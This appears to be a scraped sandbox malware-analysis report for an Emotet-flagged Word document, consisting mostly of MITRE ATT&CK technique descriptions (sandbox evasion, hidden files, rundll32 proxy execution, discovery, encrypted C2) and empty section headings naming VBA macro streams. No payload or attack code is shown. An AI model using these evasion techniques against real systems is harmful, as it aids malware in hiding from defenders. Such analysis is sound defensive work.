Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report info_2020_NJY_31940448.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "info_2020_NJY_31940448.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Bt08uhxu1tnhy1, Stream Size: 701

General

VBA Code Keywords

VBA Code

VBA File Name: Xhlj9irufb65_wekzf, Stream Size: 14399

General

VBA Code Keywords

VBA Code

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre